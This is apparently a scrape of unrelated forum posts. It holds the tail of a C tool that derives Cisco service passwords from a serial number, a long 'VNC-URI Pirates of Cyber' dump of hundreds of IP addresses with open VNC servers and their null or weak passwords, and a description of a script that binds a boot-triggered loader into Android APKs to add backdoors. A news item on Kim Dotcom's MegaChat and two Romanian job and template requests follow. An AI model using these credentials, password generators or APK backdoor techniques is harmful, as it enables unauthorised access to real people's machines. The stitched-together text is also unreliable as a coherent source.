sizeof(service), secret_pass); MD5_CTX context; MD5_Init(&context); MD5_Update(&context, service, strlen(service)); MD5_Final(digest, &context); printf_s("Service Password: "); for (int i = 0; i < sizeof(digest)-12; i++) printf("%02x", digest[i]); } return 0; } void fuzz_string(char *str) { while (*str){ switch (*str) { case '1': *str = 'i'; break; case '0': *str = 'o'; break; case '_': *str = '-'; break; } str++; } } void to_lower(char *str) { while (*str) { if (*str >= 'A' && *str <= 'Z') { *str += 0x20; } str++; } } void usage(char *name) { printf_s("\nUsage: %s -p password -s serial\n", name); printf_s(" -p <password> | Cisco Service Temp Password\n"); printf_s(" -s <serial> | Cisco Serial Number\n"); printf_s(" -h | This Help Menu\n"); printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name); exit(0); } Source

https://cloud.google.com/

VNC-URI Pirates of Cyber --------------------------------------------------------------------- 81.94.239.68:5900-null-[Xen-nigs.webplace.lv] 46.109.212.76:5900-null-[till11:0] 46.109.136.207:5900-null-[till1:0] 78.84.192.178:5900-null-[till1:0] 78.84.24.106:5900-null-[till1:0] 80.250.58.140:5900-12345-[None] 80.70.22.202:5900-123456-[a55 ( 192.168.210.18 )] 77.38.208.224:5900-password-[None] 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 5.9.136.250:5900-null-[None] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.136.247:5900-null-[None] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.9.69.146:5900-null-[None] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.2.9.86:5900-1234-[x0vncserver] ------------------------------------------------------------ 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.69.146:5900-null-[None] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.136.250:5900-null-[None] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.30.34.78:5900-null-[None] 5.30.18.129:5900-null-[None] 5.30.20.175:5900-null-[None] 5.30.18.209:5900-null-[None] 5.30.17.196:5900-null-[None] 5.30.40.140:5900-null-[None] 5.39.233.205:5900-null-[x11] 5.38.81.16:5900-null-[root's x11 desktop (M20:0)] 5.28.90.135:5900-null-[None] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.136.247:5900-null-[None] 5.19.173.130:5900-123-[MorSer] 5.2.9.86:5900-1234-[x0vncserver] 5.11.219.75:5900-123456-[WindowsCE] 5.36.212.195:5900-12345678-[OMNPB750] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.146:5900-null-[QEMU (mail)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.136.247:5900-null-[None] 5.9.136.250:5900-null-[None] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.30.20.175:5900-null-[None] 5.30.17.196:5900-null-[None] 5.30.18.209:5900-null-[None] 5.30.40.140:5900-null-[None] 5.30.18.129:5900-null-[None] 5.39.233.205:5900-null-[x11] 79.4.85.88:5900-null-[nobody's TeamLinux-Vnc desktop (server.cedab.net:1)] 79.10.168.226:5900-null-[myGekko VNC] 79.16.102.77:5900-null-[Qt for Embedded Linux VNC Server] 79.18.41.139:5900-null-[WCE301238004] 79.16.96.62:5900-null-[bJE-CP1:0.0] 79.16.22.133:5900-1-[x0vncserver] 79.17.255.33:5900-1-[None] 79.28.48.20:5900-null-[gw-611:0] 79.31.103.60:5900-null-[bJE-CP1:0.0] 79.31.110.67:5900-null-[myGekko VNC] 79.39.113.106:5900-null-[dvadmin@ServerPaghe] 79.39.152.163:5900-null-[vmserver@vmserver2012] 79.40.105.208:5900-null-[myGekko VNC] 79.43.161.86:5900-null-[PC-GIUSEPPE] 79.48.105.4:5900-null-[TKC] 79.51.173.186:5900-null-[MI_01383B] 79.54.60.182:5900-null-[servone@servone] 79.43.110.178:5900-null-[LvisCasa (192.168.1.88)] 79.48.10.1:5900-null-[None] 79.59.197.211:5900-null-[gw-140:0] 79.29.25.10:5900-null-[None] 79.78.23.60:5900-null-[PDM1] 79.79.99.89:5900-null-[None] 79.97.173.107:5900-null-[uBUNTUVM01:0] 79.99.68.155:5900-null-[x11] 79.98.213.182:5900-null-[QEMU (Inga-srv)] 79.101.104.54:5900-null-[None] 79.102.131.118:5900-null-[geten@HTPC] 79.102.130.51:5900-null-[None] 79.111.160.99:5900-null-[None] 79.108.75.135:5900-null-[joseca@iCenter] 79.120.76.215:5900-null-[QEMU (Puppet)] 79.97.14.244:5900-null-[None] 79.97.3.140:5900-null-[None] 79.97.38.37:5900-null-[None] 79.97.114.165:5900-null-[None] 79.124.31.10:5900-null-[QEMU (windows)] 79.114.36.219:5900-null-[mihai@debian] 79.121.87.28:5900-null-[None] 79.125.52.165:5900-null-[None] 79.127.99.70:5900-null-[qazvin@qazvin-P55A-UD3P] 79.127.124.98:5900-null-[LibVNCServer] 79.129.26.183:5900-1-[emileonsrv ( 192.168.1.30, 169.254.95.120 )] 79.129.56.142:5900-1-[ionianstarsrv ( 192.168.2.10 )] 79.132.172.3:5900-1-[None] 79.138.40.134:5900-null-[None] 79.138.58.103:5900-null-[None] 79.135.35.195:5900-null-[sERVER1] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 79.143.161.228:5900-null-[tuco@dnevna] 79.147.177.183:5900-null-[sERVIDOR] 79.148.120.220:5900-null-[None] 79.148.124.146:5900-null-[administrador@srv6] 79.148.187.129:5900-null-[Device 10001] 79.140.198.77:5900-null-[None] 79.155.25.159:5900-null-[QEMU] 79.154.197.110:5900-null-[LVIS-3E100 (192.168.1.252)] 79.156.165.29:5900-null-[root's x11 desktop (olostsrv1:1)] 79.158.176.235:5900-null-[QEMU] 79.161.99.16:5900-null-[ofalt@ofalt-linux01] 79.159.83.195:5900-null-[Device 10001] 79.170.44.61:5900-null-[QEMU (wwwdev)] 79.175.181.14:5900-null-[None] 79.170.166.158:5900-1-[krylova ( 192.168.0.99 ) - service mode] 79.188.192.58:5900-null-[QEMU] 79.188.127.226:5900-null-[pos@kasa] 79.186.175.177:5900-null-[None] 79.182.216.219:5900-null-[None] 79.189.101.242:5900-null-[serwis@kasa] 79.195.254.218:5900-null-[myGekko VNC] 79.192.207.230:5900-null-[WindowsCE] 79.200.35.238:5900-null-[T-PC] 79.188.89.142:5900-1-[None] 79.208.152.189:5900-null-[bJE-CP1:0.0] 79.206.124.26:5900-null-[myGekko VNC] 79.193.212.160:5900-null-[x11] 79.207.140.136:5900-1-[None] 79.222.194.126:5900-null-[raiserback@Debian-zotac] 79.223.110.17:5900-null-[None] 79.221.220.167:5900-null-[myGekko VNC] 79.215.62.164:5900-null-[None] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 79.54.24.67:5900-null-[fark@Palantir] 79.59.91.226:5900-null-[QEMU (Router)] 79.77.143.42:5900-12-[bACKOFFICE] 79.78.18.100:5900-12-[bACKOFFICE] 79.144.122.145:5900-null-[guifi@guifi-desktop] 79.177.109.85:5900-null-[parents.boxen.shmarya.net:0] 5.19.173.130:5900-123-[MorSer] 79.105.235.71:5900-123-[videopc ( 192.168.1.15 ) - application mode] 79.113.20.229:5900-123-[None] 79.129.59.124:5900-123-[c-nario-msg ( 192.168.0.10 )] 79.142.87.86:5900-123-[None] 79.173.85.134:5900-123-[server ( 192.168.0.1, 10.38.114.11 ) - service mode] 79.186.78.16:5900-123-[NARZEDZIAK-SRV] 79.188.38.74:5900-123-[magazyn508 ( 79.188.38.74, 10.10.44.233 ) - service mode] 79.199.87.35:5900-123-[None] 79.201.168.85:5900-123-[bioenergie-pc ( 192.168.19.2 ) - service mode] 79.227.138.157:5900-123-[oem-ugm0p5m1msx ( 192.168.1.241 )] 5.2.9.86:5900-1234-[x0vncserver] 79.13.199.27:5900-1234-[brain] 79.38.220.98:5900-1234-[x0vncserver] 79.59.157.27:5900-1234-[x0vncserver] 79.59.237.197:5900-1234-[sERVERSTUDIO5] 79.45.144.227:5900-1234-[TKC] 79.109.156.69:5900-1234-[tpv ( 192.168.1.100 ) - service mode] 79.118.236.131:5900-1234-[test-pc ( 192.168.0.120 ) - service mode] 79.114.57.182:5900-1234-[None] 79.129.27.71:5900-1234-[sb08office ( 192.168.108.10, 25.38.50.91 )] 79.129.114.158:5900-1234-[sbsrv01 ( 192.168.101.10, 25.141.43.240 ) - service mode] 79.129.115.27:5900-1234-[grammateia ( 192.168.0.110 )] 79.129.120.79:5900-1234-[2003-srv ( 192.168.0.10 )] 79.147.158.119:5900-1234-[servidor-hp] 79.148.240.21:5900-1234-[sF-ISA11] 79.168.10.84:5900-1234-[sBSTALSERVER] 79.187.8.90:5900-1234-[bJE-CP1:0.0] 79.187.155.118:5900-1234-[kasa ( 192.168.1.100 ) - service mode] 79.184.105.171:5900-1234-[None] 79.188.16.86:5900-1234-[kasa ( 192.168.1.101 ) - service mode] 79.188.148.234:5900-1234-[ksiegowosc-srw ( 192.168.1.100 )] 79.188.188.91:5900-1234-[serwer4043 ( 192.168.0.31 )] 79.208.3.24:5900-1234-[bJE-CP1:0.0] 79.226.164.160:5900-1234-[system-v1230 ( 192.168.178.29 )] 79.40.250.61:5900-12345-[serverswht ( 192.168.18.2 )] 79.61.0.2:5900-12345-[x0vncserver] 79.129.36.239:5900-12345-[sb14srv ( 192.168.114.10, 25.167.215.104 ) - application mode] 79.145.194.46:5900-12345-[server1 ( 192.168.1.200 )] 79.136.249.180:5900-12345-[None] 79.151.233.183:5900-12345-[mirnito ( 192.168.1.11 ) - application mode] 79.176.113.22:5900-12345-[tamipeleg-pc ( 10.0.0.2 ) - service mode] 79.186.202.200:5900-12345-[ora-srv ( 10.10.10.250, 192.168.1.200 ) - service mode] 79.184.98.224:5900-12345-[None] 79.187.168.138:5900-12345-[None] 79.225.81.27:5900-12345-[x510 ( 192.168.0.250 ) - service mode] 5.11.219.75:5900-123456-[WindowsCE] 79.39.185.154:5900-123456-[PC_SPARTACO] 79.60.243.58:5900-123456-[brain ( 192.168.1.100 ) - application mode] 79.129.15.6:5900-123456-[None] 79.129.17.146:5900-123456-[marinos ( 192.168.1.56 ) - application mode] 79.129.96.247:5900-123456-[user-think1 ( 192.168.1.10 ) - service mode] 79.165.234.221:5900-123456-[adminpc ( 192.168.0.8 )] 79.152.132.110:5900-123456-[None] 79.184.46.5:5900-123456-[pcmumariusza ( 192.168.1.2 ) - service mode] 79.188.45.122:5900-123456-[None] 79.188.45.123:5900-123456-[None] 79.188.45.120:5900-123456-[None] 79.188.45.121:5900-123456-[None] 79.189.162.64:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.66:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.67:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.71:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.69:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.68:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.70:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.65:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.205.121.232:5900-123456-[server ( 192.168.1.5, 192.168.10.200, 192.168.130.21, 169.254.136.1 )] 5.36.212.195:5900-12345678-[OMNPB750] 79.23.47.84:5900-12345678-[MacMini] 79.36.11.85:5900-12345678-[DVR [000322164273]] 79.58.3.192:5900-12345678-[server] 79.59.5.138:5900-12345678-[server ( 192.168.1.239 ) - service mode] 79.104.30.154:5900-12345678-[None] 79.142.144.242:5900-12345678-[sever-rs] 79.148.121.184:5900-12345678-[mercur ( 192.168.1.2, 25.106.139.161 ) - service mode] 79.170.254.19:5900-12345678-[mdm] 79.190.51.18:5900-12345678-[ksiegowosc ( 192.168.1.30 ) - service mode] 79.131.68.135:5900-123456789-[deiterminal ( 192.168.1.10 ) - service mode] 79.205.217.126:5900-123456789-[trattoria-pc ( 192.168.2.90, 192.168.10.90 ) - service mode] 79.50.246.50:5900-87654321-[Mac mini di Silvano] 79.54.29.199:5900-1111-[Globe] 79.148.234.18:5900-1111-[stbvision] 5.40.37.52:5900-11111-[edomo ( 192.168.0.250 )] 5.40.37.52:5900-11111-[edomo ( 192.168.0.250 )] 79.214.188.96:5900-111-[klimperland-bs1 ( 192.168.178.26 )] 79.45.108.156:5900-admin-[bJE-CP1:0.0] 79.136.180.3:5900-admin-[microsof-ae69c3 ( 79.136.180.3 )] 79.187.183.86:5900-admin-[tescocctv ( 192.168.1.10 ) - application mode] 79.204.220.80:5900-admin-[bJE-CP1:0.0] 79.206.245.136:5900-admin-[bJE-CP1:0.0] 79.225.0.99:5900-admin-[bJE-CP1:0.0] 79.14.56.196:5900-password-[matteo-1000he ( 192.168.1.204 ) - service mode] 79.13.120.57:5900-password-[None] 79.184.31.216:5900-admin12-[None] 79.119.123.53:5900-parola-[oro] 79.148.179.112:5900-2000-[scargo-server ( 192.168.1.2, 172.16.1.21 )] 79.222.146.89:5900-root-[master] 79.14.180.155:5900-personal computer-[lt01 ( 192.168.1.13 )] 5.12.18.117:5900-steaua-[mamaie ( 10.100.101.10 )] 79.190.106.116:5900-pula-[None] 79.94.171.223:5900-test-[None]

Internet entrepreneur Kim Dotcom has released an encrypted chat service, called MegaChat, to compete with the Microsoft-owned Skype. The release would be rolled out gradually, beginning with video-calling on Thursday, he said. The news came as it emerged a top EU official wants companies to be required by law to hand over encryption keys. The EU counter-terrorism coordinator's proposal follows a similar call by Prime Minister David Cameron. In a document leaked by the civil liberties group Statewatch, Gilles de Kerchove said encryption "increasingly makes lawful interception by the relevant national authorities technically difficult or even impossible". He wrote: "The [European] Commission should be invited to explore rules obliging internet and telecommunications companies operating in the EU to provide, under certain conditions as set out in the relevant national laws and in full compliance with fundamental rights, access of the relevant national authorities to communications (ie share encryption keys)." Mr De Kerchove refused to comment on the leaked document. Earlier this month, Mr Cameron said he wanted internet firms to allow the government to view encrypted messages in order to aid the security services. But his plans to revive the Communications Data Bill, dubbed the "snoopers' charter", were criticised by civil liberties groups and the Deputy Prime Minister, Nick Clegg. Announcing the launch of the beta version of his MegaChat service, Mr Dotcom said that video-calling would gradually be followed by a text-chat service and video-conferencing. About three years ago, Mr Dotcom's Megaupload site was seized and he was arrested in an armed raid on his New Zealand house. Announcing the launch of MegaChat on Twitter, he noted the timeline that lead from the raid to Thursday's announcement, highlighting the launch of his new site, Mega, and a political party in the subsequent years. And he wrote: "#Mega offers a security bounty again. Please report any security flaw to us. We'll fix it and reward you. Thanks for helping." Mr Dotcom still faces extradition from New Zealand to the United States on copyright infringement charges. In November last year, he said he was "broke" as a result of the consequent legal fight. He put the cost at $10m (£6.4m) since his arrest in 2012. Source

apk_binder_script allows us to unify two apk’s in one or add a service apk smali code to the target. This copy smali code, active and manifest. Implements a receiver acting loader loading the class specified as a parameter (a service). The original application is normally run in parallel, the service is invoked by the loader based on two events: android.intent.action.BOOT_COMPLETED android.intent.action.ACTION_POWER_CONNECTED You can add actions and permissions as desired. In short, allows us to “extend” the functionality of a apk, doors implement “administrative” etc. Download: https://github.com/funsecurity/apk_binder_script

deleted

Daca va pricepeti la reparat aparate foto, video, sisteme audio, video etc. Tot ce tine de gama asta sau se poate incadra in astfel de categorie, va pot pune la dispozitie un interviu si o proba practica, sa dovediti ceea ce sustineti ca stiti. Jobul este in cadrul unui service din Bucuresti, autorizat Samsung. Program de 8 ore + 1 ora pauza. Trebuie sa cunoasteti electronica, sa fiti calmi chiar si in cazurile cand aveti un client fata in fata si sa aveti habar de ce trebuie reparat. Mai multe detalii va dau prin PM.

Salut, Am nevoie de un template flash sau non-flash pentru service IT, dar care sa arate fff bine, business, elegant, etc. Pe template monster nu am gasit, poate ma ajutati voi. Merci